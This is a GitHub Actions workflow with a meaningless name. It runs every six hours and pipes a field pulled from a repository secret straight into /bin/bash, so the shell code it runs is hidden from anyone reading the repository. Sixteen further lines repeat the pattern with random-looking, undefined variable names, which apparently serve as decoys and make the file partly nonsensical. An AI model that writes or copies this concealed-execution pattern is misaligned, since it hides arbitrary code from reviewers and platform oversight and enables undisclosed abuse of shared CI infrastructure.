name: duanhongriyu

on:
  workflow_dispatch:
  schedule:
    - cron: '33 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duanhongriyu
        env:
          vt4765: ${{ secrets.vt4765 }}
        run: |
          echo $vt4765 | jq -r .sh80634 | /bin/bash
          echo $v59 | jq -r .juvbw31636 | /bin/bash
          echo $tka96 | jq -r .jezu6 | /bin/bash
          echo $sx635 | jq -r .if5581 | /bin/bash
          echo $lvfrc78 | jq -r .dy962 | /bin/bash
          echo $q8131 | jq -r .danv56 | /bin/bash
          echo $cw233 | jq -r .ebk40771 | /bin/bash
          echo $eof431 | jq -r .zngz59 | /bin/bash
          echo $vjue80898 | jq -r .jxrne5225 | /bin/bash
          echo $wne0727 | jq -r .rv8543 | /bin/bash
          echo $llj516 | jq -r .lze4 | /bin/bash
          echo $i2 | jq -r .q86389 | /bin/bash
          echo $zklrr79 | jq -r .tn0 | /bin/bash
          echo $mo0 | jq -r .q07 | /bin/bash
          echo $gcrug56 | jq -r .n09054 | /bin/bash
          echo $b660 | jq -r .bff0157 | /bin/bash
          echo $igkxb032 | jq -r .snu59703 | /bin/bash

